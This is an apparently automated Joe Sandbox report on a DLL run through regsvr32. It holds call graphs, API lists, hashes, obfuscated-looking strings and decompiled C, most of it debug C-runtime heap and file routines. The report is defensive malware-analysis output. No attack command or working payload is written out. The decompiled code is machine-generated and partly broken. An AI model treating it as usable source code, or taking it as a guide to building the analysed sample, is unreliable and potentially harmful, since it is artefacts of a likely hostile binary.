18467->18468 18474 7fef754fc86 18468->18474 18469 7fef754fd59 18486 7fef7539360 LeaveCriticalSection 18469->18486 18471 7fef754fd63 18471->18463 18472 7fef754fd09 DeleteCriticalSection 18472->18474 18474->18469 18474->18472 18475 7fef7550580 18474->18475 18476 7fef7550599 18475->18476 18477 7fef755062a 18476->18477 18478 7fef75505ef 18476->18478 18479 7fef7550623 18477->18479 18487 7fef754ae10 18477->18487 18482 7fef753bd70 
_invalid_parameter 17 API calls 18478->18482 18479->18474 18481 7fef7550651 18491 7fef7550680 18481->18491 18482->18479 18484 7fef755065c 18485 7fef754aee0 2 API calls 18484->18485 18485->18479 18486->18471 18488 7fef754ae77 EnterCriticalSection 18487->18488 18489 7fef754ae27 18487->18489 18490 7fef754ae3b 18488->18490 18489->18488 18489->18490 18490->18481 18494 7fef7550699 18491->18494 18492 7fef75506ef 18497 7fef753bd70 _invalid_parameter 17 API calls 18492->18497 18493 7fef755072d 18495 7fef7550723 18493->18495 18496 7fef754fdf0 _fflush_nolock 17 API calls 18493->18496 18494->18492 18494->18493 18495->18484 18498 7fef7550752 18496->18498 18497->18495 18499 7fef754afb0 _fflush_nolock 17 API calls 18498->18499 18500 7fef755076a 18499->18500 18502 7fef7550a20 18500->18502 18503 7fef7550a53 18502->18503 18509 7fef7550a33 __doserrno 18502->18509 18504 7fef7550abc __doserrno 18503->18504 18508 7fef7550b05 18503->18508 18506 7fef753bd70 _invalid_parameter 17 API calls 18504->18506 18505 7fef7550bd2 18507 7fef754fae0 _fflush_nolock 3 API calls 18505->18507 18506->18509 18510 7fef7550bdb 18507->18510 18508->18505 18511 7fef7550b89 __doserrno 18508->18511 18509->18495 18514 7fef7550c13 18510->18514 18516 7fef7550c80 18510->18516 18513 7fef753bd70 _invalid_parameter 17 API calls 18511->18513 18513->18509 18529 7fef754fbc0 LeaveCriticalSection 18514->18529 18517 7fef754f900 _fflush_nolock 17 API calls 18516->18517 18519 7fef7550c91 18517->18519 18518 7fef7550d05 18530 7fef754f7d0 18518->18530 18519->18518 18521 7fef7550ce5 18519->18521 18522 7fef754f900 _fflush_nolock 17 API calls 18519->18522 18521->18518 18523 7fef754f900 _fflush_nolock 17 API calls 18521->18523 18524 7fef7550cd6 18522->18524 18525 7fef7550cf8 CloseHandle 18523->18525 18526 7fef754f900 _fflush_nolock 17 API calls 18524->18526 18525->18518 18527 7fef7550d0f GetLastError 18525->18527 18526->18521 18527->18518 18528 7fef7550d22 _dosmaperr 18528->18514 18529->18509 18531 7fef754f7e3 18530->18531 18532 
7fef754f878 __doserrno 18530->18532 18531->18532 18533 7fef754f87a SetStdHandle 18531->18533 18534 7fef754f86a 18531->18534 18532->18528 18533->18532 18535 7fef754f871 18534->18535 18536 7fef754f889 SetStdHandle 18534->18536 18535->18532 18537 7fef754f898 SetStdHandle 18535->18537 18536->18532 18537->18532 18853 7fef75448e0 18854 7fef75448f7 std::bad_exception::~bad_exception 18853->18854 18855 7fef754490c 18854->18855 18856 7fef754d710 _Ref_count LeaveCriticalSection 18854->18856 18856->18855 18052 7fef7549aeb 18053 7fef7549b2c 18052->18053 18054 7fef7549b18 18052->18054 18056 7fef754ab10 17 API calls 18053->18056 18055 7fef7549520 19 API calls 18054->18055 18055->18053 18061 7fef7549b38 18056->18061 18057 7fef7549c04 18058 7fef754a1cb 18057->18058 18062 7fef7549c23 GetConsoleCP 18057->18062 18059 7fef754a205 18058->18059 18060 7fef754a8ad WriteFile 18058->18060 18063 7fef754a400 18059->18063 18066 7fef754a21a 18059->18066 18064 7fef754a923 GetLastError 18060->18064 18071 7fef7549dd9 _dosmaperr __doserrno 18060->18071 18061->18057 18065 7fef7549bae GetConsoleMode 18061->18065 18083 7fef7549c4d 18062->18083 18067 7fef754a40e 18063->18067 18081 7fef754a5f3 18063->18081 18064->18071 18065->18057 18068 7fef754a33e WriteFile 18066->18068 18066->18071 18067->18071 18072 7fef754a531 WriteFile 18067->18072 18068->18066 18070 7fef754a3ea GetLastError 18068->18070 18069 7fef7533280 __GSHandlerCheck 8 API calls 18073 7fef754a9f5 18069->18073 18070->18071 18071->18069 18072->18067 18076 7fef754a5dd GetLastError 18072->18076 18074 7fef754a726 WideCharToMultiByte 18078 7fef754a791 GetLastError 18074->18078 18074->18081 18075 7fef7549f66 WideCharToMultiByte 18075->18071 18077 7fef7549fbf WriteFile 18075->18077 18076->18071 18080 7fef754a050 GetLastError 18077->18080 18077->18083 18078->18071 18079 7fef754a7b0 WriteFile 18079->18081 18082 7fef754a857 GetLastError 18079->18082 18080->18071 18080->18083 18081->18071 18081->18074 18081->18079 18082->18081 18083->18071 18083->18075 
18084 7fef754a06d WriteFile 18083->18084 18085 7fef754a158 GetLastError 18083->18085 18087 7fef754f330 MultiByteToWideChar MultiByteToWideChar wcsxfrm 18083->18087 18088 7fef754fc00 WriteConsoleW CreateFileW _putwch_nolock 18083->18088 18089 7fef754a1b5 GetLastError 18083->18089 18084->18083 18086 7fef754a103 GetLastError 18084->18086 18085->18071 18086->18071 18087->18083 18088->18083 18089->18071 18547 7fef75391ea 18548 7fef75391ef 18547->18548 18549 7fef75374e0 __crtExitProcess 3 API calls 18548->18549 18550 7fef7539203 18549->18550 18857 7fef753d0ea 18858 7fef753d0ef 18857->18858 18859 7fef7537090 _exit 33 API calls 18858->18859 18860 7fef753d209 18858->18860 18864 7fef753d0fc 18858->18864 18859->18860 18862 7fef753d289 18860->18862 18865 7fef7533d00 RtlEncodePointer 18860->18865 18862->18864 18866 7fef7539360 LeaveCriticalSection 18862->18866 18865->18862 18866->18864 18873 7fef75370e6 18874 7fef7537090 _exit 33 API calls 18873->18874 18875 7fef75370f0 18874->18875 18560 7fef75475e9 18563 7fef75475fb 18560->18563 18565 7fef75475f4 18560->18565 18561 7fef7533280 __GSHandlerCheck 8 API calls 18562 7fef7547d85 18561->18562 18564 7fef753bd70 _invalid_parameter 17 API calls 18563->18564 18564->18565 18565->18561 17538 7fef753a7e9 17540 7fef753a7f9 17538->17540 17539 7fef753a80a 17540->17539 17541 7fef7533280 __GSHandlerCheck 8 API calls 17540->17541 17542 7fef753aa30 17541->17542 17543 7fef753c7e9 17544 7fef753c90c EncodePointer EncodePointer 17543->17544 17545 7fef753c80d 17543->17545 17548 7fef753c8ca 17544->17548 17546 7fef753c872 17545->17546 17552 7fef7534a00 17545->17552 17546->17548 17549 7fef7534a00 _realloc_dbg 30 API calls 17546->17549 17550 7fef753c8ce EncodePointer 17546->17550 17551 7fef753c8bd 17549->17551 17550->17544 17551->17548 17551->17550 17553 7fef7534a22 17552->17553 17558 7fef7534a70 17553->17558 17555 7fef7534a4c 17569 7fef7539360 LeaveCriticalSection 17555->17569 17557 7fef7534a5b 17557->17546 17559 7fef7534ad4 _realloc_dbg 17558->17559 
17568 7fef7534aae _calloc_dbg_impl 17558->17568 17560 7fef7536380 _CrtIsValidHeapPointer HeapValidate 17559->17560 17559->17568 17565 7fef7534e2c 17560->17565 17561 7fef7534f64 17570 7fef753bc30 17561->17570 17562 7fef7534f90 17585 7fef753ba60 17562->17585 17565->17561 17565->17562 17565->17568 17566 7fef7534fa6 17567 7fef7534fba HeapSize 17566->17567 17566->17568 17567->17568 17568->17555 17569->17557 17571 7fef753bc5f 17570->17571 17572 7fef753bc50 17570->17572 17573 7fef753bc67 17571->17573 17583 7fef753bc78 17571->17583 17596 7fef753abf0 17572->17596 17575 7fef753c020 _free_base 2 API calls 17573->17575 17581 7fef753bc5a _get_errno_from_oserr 17575->17581 17576 7fef753bcba 17578 7fef753abb0 _callnewh DecodePointer 17576->17578 17577 7fef753bc9a HeapReAlloc 17577->17583 17578->17581 17579 7fef753bce4 17580 7fef753bcee GetLastError 17579->17580 17579->17581 17580->17581 17581->17568 17582 7fef753abb0 _callnewh DecodePointer 17582->17583 17583->17576 17583->17577 17583->17579 17583->17582 17584 7fef753bd1f GetLastError 17583->17584 17584->17581 17586 7fef753ba76 17585->17586 17587 7fef753bacc 17586->17587 17588 7fef753bb07 17586->17588 17591 7fef753bd70 _invalid_parameter 17 API calls 17587->17591 17589 7fef753bb00 _get_errno_from_oserr 17588->17589 17590 7fef753bb32 HeapSize HeapReAlloc 17588->17590 17589->17566 17590->17589 17593 7fef753bb74 17590->17593 17591->17589 17592 7fef753bba0 GetLastError 17592->17589 17593->17592 17602 7fef753bbd0 HeapQueryInformation 17593->17602 17597 7fef753ac4d 17596->17597 17599 7fef753ac0a 17596->17599 17598 7fef753abb0 _callnewh DecodePointer 17597->17598 17601 7fef753ac21 17598->17601 17600 7fef753abb0 _callnewh DecodePointer 17599->17600 17599->17601 17600->17599 17601->17581 17603 7fef753bb90 17602->17603 17603->17589 17603->17592

                                                      Control-flow Graph

                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.944037719.000007FEF7531000.00000020.00000001.01000000.00000008.sdmp, Offset: 000007FEF7530000, based on PE: true
                                                      • Associated: 00000005.00000002.944013265.000007FEF7530000.00000002.00000001.01000000.00000008.sdmp
                                                      • Associated: 00000005.00000002.944079382.000007FEF7552000.00000002.00000001.01000000.00000008.sdmp
                                                      • Associated: 00000005.00000002.944087822.000007FEF755B000.00000004.00000001.01000000.00000008.sdmp
                                                      • Associated: 00000005.00000002.944092955.000007FEF755F000.00000002.00000001.01000000.00000008.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_7fef7530000_regsvr32.jbxd
                                                      Similarity
                                                      • API ID: AllocAllocateExitFreeHeapLibraryLoadMessageProcessTaskVirtual
                                                      • String ID: %<$Ya]$g@$$|X$ 4bB$!@C+$"V2$#z$U$$931$$:*:$$D1v$$huN$$}%z$%8#$%</$%U9$&\hR$*hH%$+ong$+iT$-{*$-'C$.#($0kj.$0.3$1\u$2s<S$3ob$5qj'$5vCx$8<-$:!@$:'U@$:9m?$;qdf$<)@P$<M}O$<v:$=kf^$>~$?CE`$@ $BxJr$C/$Cb47$D)'U$Eekg$FLIn$HPZ$Ko*h$L ]1$M13U$M1vi$MDj$N1kj^H<M1vf@$_yiXP+o*hH*fZQl5vC5qjfXErgxjcCb4v_e75<edkge!z$U9k+h$P+oo$PX5$Puvm$QlyO$R;pB$S[L$S}pn$U+on$U9#($V#s$V9s$VO4$^*C$`AnM$aUJ'$c-_j$cDj$e7tc$ePO$gVWH$h78<$hx"$j+h$kxfc$l|f$mCl4$mbPv$pAT#$rkE@$t(O$tc`$w&ed$wC54$werfault.exe$wk/$xA\#${$U|${fM$$|e:$} z$$}'6$}WL$It$"!k$%Uc$(pd$*hH$,$n$,1.$9[+$?x?$EBg$M z$N3$Pl5$i~e$jfX$oE$`I
                                                      • API String ID: 2181984824-2032897877
                                                      • Opcode ID: be2b6721a01229fe6d62131d54c2e067f3d2e24da2d5df3bb551e88fe72b0fff
                                                      • Instruction ID: b6113464a3069b9c2ea7483fb119c14b36b3fc08ee8feeeb5aad03cf64425d1c
                                                      • Opcode Fuzzy Hash: be2b6721a01229fe6d62131d54c2e067f3d2e24da2d5df3bb551e88fe72b0fff
                                                      • Instruction Fuzzy Hash: CCE2C8F691A7C58FE3B48F62AA817DD3AA0F345748F509208D3991FA1DCB395242CF85
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Control-flow Graph

                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.944037719.000007FEF7531000.00000020.00000001.01000000.00000008.sdmp, Offset: 000007FEF7530000, based on PE: true
                                                      • Associated: 00000005.00000002.944013265.000007FEF7530000.00000002.00000001.01000000.00000008.sdmp
                                                      • Associated: 00000005.00000002.944079382.000007FEF7552000.00000002.00000001.01000000.00000008.sdmp
                                                      • Associated: 00000005.00000002.944087822.000007FEF755B000.00000004.00000001.01000000.00000008.sdmp
                                                      • Associated: 00000005.00000002.944092955.000007FEF755F000.00000002.00000001.01000000.00000008.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_7fef7530000_regsvr32.jbxd
                                                      Similarity
                                                      • API ID: _calloc_dbg$InfoStartup_calloc_dbg_impl
                                                      • String ID: f:\dd\vctools\crt_bld\self_64_amd64\crt\src\ioinit.c
                                                      • API String ID: 1930727954-3864165772
                                                      • Opcode ID: 53ed6c7dc9c3017b6de27dce3b9aec11c1bcaebc47f482f4e33ed4626b187432
                                                      • Instruction ID: 4fd499f206e1269e95e05e694953bda4b6002576a2de31bc31bcf6f481f5495e
                                                      • Opcode Fuzzy Hash: 53ed6c7dc9c3017b6de27dce3b9aec11c1bcaebc47f482f4e33ed4626b187432
                                                      • Instruction Fuzzy Hash: 13F11A32A1DBC5C9E7B08B19E88076AB7A1F389B64F104626DAAD477F4DB3CD445CB01
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Control-flow Graph

                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.944037719.000007FEF7531000.00000020.00000001.01000000.00000008.sdmp, Offset: 000007FEF7530000, based on PE: true
                                                      • Associated: 00000005.00000002.944013265.000007FEF7530000.00000002.00000001.01000000.00000008.sdmp
                                                      • Associated: 00000005.00000002.944079382.000007FEF7552000.00000002.00000001.01000000.00000008.sdmp
                                                      • Associated: 00000005.00000002.944087822.000007FEF755B000.00000004.00000001.01000000.00000008.sdmp
                                                      • Associated: 00000005.00000002.944092955.000007FEF755F000.00000002.00000001.01000000.00000008.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_7fef7530000_regsvr32.jbxd
                                                      Similarity
                                                      • API ID: _calloc_dbg$__initmbctable_invalid_parameter_invoke_watson_if_error
                                                      • String ID: 0*X$_setenvp$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\stdenvp.c$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\stdenvp.c$strcpy_s(*env, cchars, p)$~
                                                      • API String ID: 1648969265-3521721853
                                                      • Opcode ID: f93d43cf3bb1813beee52146895ee3ce0099543f481cf7d004c716eae911393f
                                                      • Instruction ID: d084276c375975cac61ca52f902c53f851fb403f988e997b31319c858ca427aa
                                                      • Opcode Fuzzy Hash: f93d43cf3bb1813beee52146895ee3ce0099543f481cf7d004c716eae911393f
                                                      • Instruction Fuzzy Hash: D1512A32A3DB8682E7D08B15E48076A77E1F389798F501536FA8E877B5CB7DE4418B40
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Control-flow Graph

                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.944037719.000007FEF7531000.00000020.00000001.01000000.00000008.sdmp, Offset: 000007FEF7530000, based on PE: true
                                                      • Associated: 00000005.00000002.944013265.000007FEF7530000.00000002.00000001.01000000.00000008.sdmp
                                                      • Associated: 00000005.00000002.944079382.000007FEF7552000.00000002.00000001.01000000.00000008.sdmp
                                                      • Associated: 00000005.00000002.944087822.000007FEF755B000.00000004.00000001.01000000.00000008.sdmp
                                                      • Associated: 00000005.00000002.944092955.000007FEF755F000.00000002.00000001.01000000.00000008.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_7fef7530000_regsvr32.jbxd
                                                      Similarity
                                                      • API ID: Pointer$Decode$_initterm$EncodeExitProcess__crt
                                                      • String ID:
                                                      • API String ID: 3799933513-0
                                                      • Opcode ID: c9a1689ff4177d35e5a558f0089bed0cb41f7669401f9128f576ef3edf69137f
                                                      • Instruction ID: 50440ff04c6b651d32773591404ba5b67e5f7cae972734bbf51138f9a8de4c41
                                                      • Opcode Fuzzy Hash: c9a1689ff4177d35e5a558f0089bed0cb41f7669401f9128f576ef3edf69137f
                                                      • Instruction Fuzzy Hash: B751EC72E3DA8685E6D09B14E48432A77E5F389798F101535FA8D427B5EF3CE444CB00
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Control-flow Graph

                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.944037719.000007FEF7531000.00000020.00000001.01000000.00000008.sdmp, Offset: 000007FEF7530000, based on PE: true
                                                      • Associated: 00000005.00000002.944013265.000007FEF7530000.00000002.00000001.01000000.00000008.sdmp
                                                      • Associated: 00000005.00000002.944079382.000007FEF7552000.00000002.00000001.01000000.00000008.sdmp
                                                      • Associated: 00000005.00000002.944087822.000007FEF755B000.00000004.00000001.01000000.00000008.sdmp
                                                      • Associated: 00000005.00000002.944092955.000007FEF755F000.00000002.00000001.01000000.00000008.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_7fef7530000_regsvr32.jbxd
                                                      Similarity
                                                      • API ID: EnvironmentStrings$ByteCharFreeMultiWide
                                                      • String ID: f:\dd\vctools\crt_bld\self_64_amd64\crt\src\a_env.c
                                                      • API String ID: 1823725401-2473407871
                                                      • Opcode ID: 12bd68ef287a579055a6545109484f2ffc82b1f6f13cfb147b3cff23ff6676d3
                                                      • Instruction ID: 668744335db3fe05506389b85c1bd172cdfc5ddd5165f6026b314cf31a900037
                                                      • Opcode Fuzzy Hash: 12bd68ef287a579055a6545109484f2ffc82b1f6f13cfb147b3cff23ff6676d3
                                                      • Instruction Fuzzy Hash: 2C41E972628B8586E7948B56F84432BB7E1F784794F100029FACD4BB78DB7EE4548B40
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Control-flow Graph

                                                      C-Code - Quality: 50%
                                                      			E000007FE7FEF753461B(void* __rdx, void* __r8, long long _a32, long long _a40, intOrPtr _a64, long long _a72, void* _a80, intOrPtr _a88, long long _a96, long long _a128, signed int _a136, long long _a144, intOrPtr _a152, void* _a160) {
                                                      				signed int _t64;
                                                      				intOrPtr _t66;
                                                      				void* _t73;
                                                      				void* _t92;
                                                      				long long _t98;
                                                      				long long _t113;
                                                      				long long _t114;
                                                      				long long _t115;
                                                      				long long _t130;
                                                      				intOrPtr _t132;
                                                      				long long _t135;
                                                      
                                                      				if (_a136 == 1) goto 0xf7534672;
                                                      				_t64 = _a136 & 0x0000ffff;
                                                      				if (_t64 == 2) goto 0xf7534672;
                                                      				if (_a136 == 3) goto 0xf7534672;
                                                      				_a40 = "Error: memory allocation: bad memory block type.\n";
                                                      				_a32 = "%s";
                                                      				r9d = 0;
                                                      				r8d = 0;
                                                      				0xf753ad00();
                                                      				if (_t64 != 1) goto 0xf7534672;
                                                      				asm("int3");
                                                      				_t98 = _a128 + 0x34;
                                                      				_a96 = _t98;
                                                      				0xf753ac90(); // executed
                                                      				_a80 = _t98;
                                                      				if (_a80 != 0) goto 0xf75346b8;
                                                      				if (_a160 == 0) goto 0xf75346b3;
                                                      				 *_a160 = 0xc;
                                                      				goto 0xf75348b4;
                                                      				_t66 =  *0xf755b03c; // 0x39
                                                      				 *0xf755b03c = _t66 + 1;
                                                      				if (_a64 == 0) goto 0xf753472d;
                                                      				 *_a80 = 0;
                                                      				 *((long long*)(_a80 + 8)) = 0;
                                                      				 *((long long*)(_a80 + 0x10)) = 0;
                                                      				 *((intOrPtr*)(_a80 + 0x18)) = 0xfedcbabc;
                                                      				 *((long long*)(_a80 + 0x20)) = _a128;
                                                      				 *(_a80 + 0x1c) = 3;
                                                      				 *((intOrPtr*)(_a80 + 0x28)) = 0;
                                                      				goto 0xf7534844;
                                                      				if (0xffffffff -  *0xf755c960 - _a128 <= 0) goto 0xf7534763;
                                                      				_t130 =  *0xf755c960; // 0x4594
                                                      				 *0xf755c960 = _t130 + _a128;
                                                      				goto 0xf753476e;
                                                      				 *0xf755c960 = 0xffffffff;
                                                      				_t132 =  *0xf755c990; // 0xa0c
                                                      				 *0xf755c990 = _t132 + _a128;
                                                      				_t113 =  *0xf755c978; // 0x35bc
                                                      				_t92 =  *0xf755c990 - _t113; // 0xa0c
                                                      				if (_t92 <= 0) goto 0xf75347a8;
                                                      				_t114 =  *0xf755c990; // 0xa0c
                                                      				 *0xf755c978 = _t114;
                                                      				if ( *0xf755c980 == 0) goto 0xf75347c4;
                                                      				_t115 =  *0xf755c980; // 0x583b00
                                                      				 *((long long*)(_t115 + 8)) = _a80;
                                                      				goto 0xf75347d0;
                                                      				 *0xf755c968 = _a80;
                                                      				_t135 =  *0xf755c980; // 0x583b00
                                                      				 *_a80 = _t135;
                                                      				 *((long long*)(_a80 + 8)) = 0;
                                                      				 *((long long*)(_a80 + 0x10)) = _a144;
                                                      				 *((intOrPtr*)(_a80 + 0x18)) = _a152;
                                                      				 *((long long*)(_a80 + 0x20)) = _a128;
                                                      				 *(_a80 + 0x1c) = _a136;
                                                      				_t78 = _a88;
                                                      				 *((intOrPtr*)(_a80 + 0x28)) = _a88;
                                                      				 *0xf755c980 = _a80;
                                                      				r8d = 4;
                                                      				E000007FE7FEF75332B0( *0xf755b04c & 0x000000ff, _a88,  *0xf755b04c & 0x000000ff, _a80 + 0x2c, __rdx, __r8);
                                                      				_t145 = _a128;
                                                      				r8d = 4;
                                                      				E000007FE7FEF75332B0( *0xf755b04c & 0x000000ff, _a88,  *0xf755b04c & 0x000000ff, _a80 + _a128 + 0x30, _a128, __r8);
                                                      				_t73 = E000007FE7FEF75332B0( *0xf755b04f & 0x000000ff, _t78,  *0xf755b04f & 0x000000ff, _a80 + 0x30, _t145, _a128);
                                                      				_a72 = _a80 + 0x30;
                                                      				return E000007FE7FEF7539360(_t73, 4);
                                                      			}















                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.944037719.000007FEF7531000.00000020.00000001.01000000.00000008.sdmp, Offset: 000007FEF7530000, based on PE: true
                                                      • Associated: 00000005.00000002.944013265.000007FEF7530000.00000002.00000001.01000000.00000008.sdmp
                                                      • Associated: 00000005.00000002.944079382.000007FEF7552000.00000002.00000001.01000000.00000008.sdmp
                                                      • Associated: 00000005.00000002.944087822.000007FEF755B000.00000004.00000001.01000000.00000008.sdmp
                                                      • Associated: 00000005.00000002.944092955.000007FEF755F000.00000002.00000001.01000000.00000008.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_7fef7530000_regsvr32.jbxd
                                                      Similarity
                                                      • API ID: _unlock
                                                      • String ID: Error: memory allocation: bad memory block type.
                                                      • API String ID: 2480363372-1537269110
                                                      • Opcode ID: 0e27953d906dd6213389af50a7459ab3260dce137a7056963e47b3559a26f049
                                                      • Instruction ID: 8d404ee4ec240fb383b5eaa1ec50f73e79e48ed922fc245f8984b595f9268ba7
                                                      • Opcode Fuzzy Hash: 0e27953d906dd6213389af50a7459ab3260dce137a7056963e47b3559a26f049
                                                      • Instruction Fuzzy Hash: 69710B76A2DB8586EBA0CB55E49032AB7E1F388B54F004535EA9D837B4DFBCE044CB00
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.944037719.000007FEF7531000.00000020.00000001.01000000.00000008.sdmp, Offset: 000007FEF7530000, based on PE: true
                                                      • Associated: 00000005.00000002.944013265.000007FEF7530000.00000002.00000001.01000000.00000008.sdmp
                                                      • Associated: 00000005.00000002.944079382.000007FEF7552000.00000002.00000001.01000000.00000008.sdmp
                                                      • Associated: 00000005.00000002.944087822.000007FEF755B000.00000004.00000001.01000000.00000008.sdmp
                                                      • Associated: 00000005.00000002.944092955.000007FEF755F000.00000002.00000001.01000000.00000008.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_7fef7530000_regsvr32.jbxd
                                                      Similarity
                                                      • API ID: EncodePointer_initterm_e
                                                      • String ID: Y
                                                      • API String ID: 1618838664-1754117475
                                                      • Opcode ID: 24d3616295d43623420cef2980f0f4d1896d7dbbaf9113ec39dfe7d3f9684184
                                                      • Instruction ID: 8d17ab7a58495d8069f622c6c8970338df7fec2bda78b20ca1d94b3edb2a395b
                                                      • Opcode Fuzzy Hash: 24d3616295d43623420cef2980f0f4d1896d7dbbaf9113ec39dfe7d3f9684184
                                                      • Instruction Fuzzy Hash: 3DE0A561E3C14297E6E5AB20EC803B927E2B794348F400931F94D4A8B5EB3DE905CB00
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 62%
                                                      			E000007FE7FEF7537540(long long __rax) {
                                                      				long long _v24;
                                                      				void* _t8;
                                                      				void* _t9;
                                                      
                                                      				_t16 = __rax;
                                                      				_t9 = E000007FE7FEF7533D00(_t8); // executed
                                                      				_v24 = __rax;
                                                      				return E000007FE7FEF753CF20(E000007FE7FEF753CFB0(E000007FE7FEF753D450(E000007FE7FEF753D470(E000007FE7FEF753BD50(E000007FE7FEF753AB90(_t9, _v24), _v24), _v24), _v24), _v24), _t16, _v24);
                                                      			}







                                                      APIs
                                                        • Part of subcall function 000007FEF7533D00: RtlEncodePointer.NTDLL ref: 000007FEF7533D06
                                                      • _initp_misc_winsig.LIBCMTD ref: 000007FEF753757B
                                                      • _initp_eh_hooks.LIBCMTD ref: 000007FEF7537585
                                                        • Part of subcall function 000007FEF753CF20: EncodePointer.KERNEL32(?,?,?,?,000007FEF753758A,?,?,?,?,?,?,000007FEF7533D39), ref: 000007FEF753CF30
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.944037719.000007FEF7531000.00000020.00000001.01000000.00000008.sdmp, Offset: 000007FEF7530000, based on PE: true
                                                      • Associated: 00000005.00000002.944013265.000007FEF7530000.00000002.00000001.01000000.00000008.sdmp
                                                      • Associated: 00000005.00000002.944079382.000007FEF7552000.00000002.00000001.01000000.00000008.sdmp
                                                      • Associated: 00000005.00000002.944087822.000007FEF755B000.00000004.00000001.01000000.00000008.sdmp
                                                      • Associated: 00000005.00000002.944092955.000007FEF755F000.00000002.00000001.01000000.00000008.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_7fef7530000_regsvr32.jbxd
                                                      Similarity
                                                      • API ID: EncodePointer$_initp_eh_hooks_initp_misc_winsig
                                                      • String ID:
                                                      • API String ID: 2678799220-0
                                                      • Opcode ID: abe4bcf42024140c0e82e0fb2c3eff25659a698c9099ae3cd415aa6bcc21eafa
                                                      • Instruction ID: 0c269c0e9c89a172d1ac21a57a99ac11d73c5c65569279fab5c480474d6cc55e
                                                      • Opcode Fuzzy Hash: abe4bcf42024140c0e82e0fb2c3eff25659a698c9099ae3cd415aa6bcc21eafa
                                                      • Instruction Fuzzy Hash: B6E0E967B2C58182E5E0BB51E86226A53B2B7C4788F400575BEDD866BBCE7CE6118A40
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.944037719.000007FEF7531000.00000020.00000001.01000000.00000008.sdmp, Offset: 000007FEF7530000, based on PE: true
                                                      • Associated: 00000005.00000002.944013265.000007FEF7530000.00000002.00000001.01000000.00000008.sdmp
                                                      • Associated: 00000005.00000002.944079382.000007FEF7552000.00000002.00000001.01000000.00000008.sdmp
                                                      • Associated: 00000005.00000002.944087822.000007FEF755B000.00000004.00000001.01000000.00000008.sdmp
                                                      • Associated: 00000005.00000002.944092955.000007FEF755F000.00000002.00000001.01000000.00000008.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_7fef7530000_regsvr32.jbxd
                                                      Similarity
                                                      • API ID: ExitProcess$AllocateHeap__crt
                                                      • String ID:
                                                      • API String ID: 4215626177-0
                                                      • Opcode ID: 77cc9cc60f8eca6ccffa51c036cc335ce9466cc401fd995fa093edd43c12ab32
                                                      • Instruction ID: a4bd884a76a7b8e783ff02c174b82987dd0b6fd64915a23fb1c4fb0920285d10
                                                      • Opcode Fuzzy Hash: 77cc9cc60f8eca6ccffa51c036cc335ce9466cc401fd995fa093edd43c12ab32
                                                      • Instruction Fuzzy Hash: 99E04F21E2898A82E6E09755E41137A62E2FB88348F400035FA4E027B5CF3DE840D600
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 58%
                                                      			E000007FE7FEF7534399(long long __rax, long long _a48, intOrPtr _a80, intOrPtr _a88, void* _a120) {
                                                      
                                                      				_a48 = __rax;
                                                      				if (_a48 == 0) goto 0xf75343ad;
                                                      				goto 0xf75343f5;
                                                      				if (_a88 != 0) goto 0xf75343ce;
                                                      				if (_a120 == 0) goto 0xf75343c7;
                                                      				 *_a120 = 0xc;
                                                      				goto 0xf75343f5;
                                                      				if (E000007FE7FEF753ABB0(_a48, _a80) != 0) goto 0xf75343f3;
                                                      				if (_a120 == 0) goto 0xf75343ef;
                                                      				 *_a120 = 0xc;
                                                      				goto 0xf75343f5;
                                                      				goto 0xf7534377;
                                                      				return 0;
                                                      			}




                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.944037719.000007FEF7531000.00000020.00000001.01000000.00000008.sdmp, Offset: 000007FEF7530000, based on PE: true
                                                      • Associated: 00000005.00000002.944013265.000007FEF7530000.00000002.00000001.01000000.00000008.sdmp
                                                      • Associated: 00000005.00000002.944079382.000007FEF7552000.00000002.00000001.01000000.00000008.sdmp
                                                      • Associated: 00000005.00000002.944087822.000007FEF755B000.00000004.00000001.01000000.00000008.sdmp
                                                      • Associated: 00000005.00000002.944092955.000007FEF755F000.00000002.00000001.01000000.00000008.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_7fef7530000_regsvr32.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 1ac0a5da81333129a8f229358abc3f3628bfe7ae3225332448e9bf5308d83ad5
                                                      • Instruction ID: f59c66b49deb2d2b3ece59ad2b01622829c0b8c50141bff4275200efde8df140
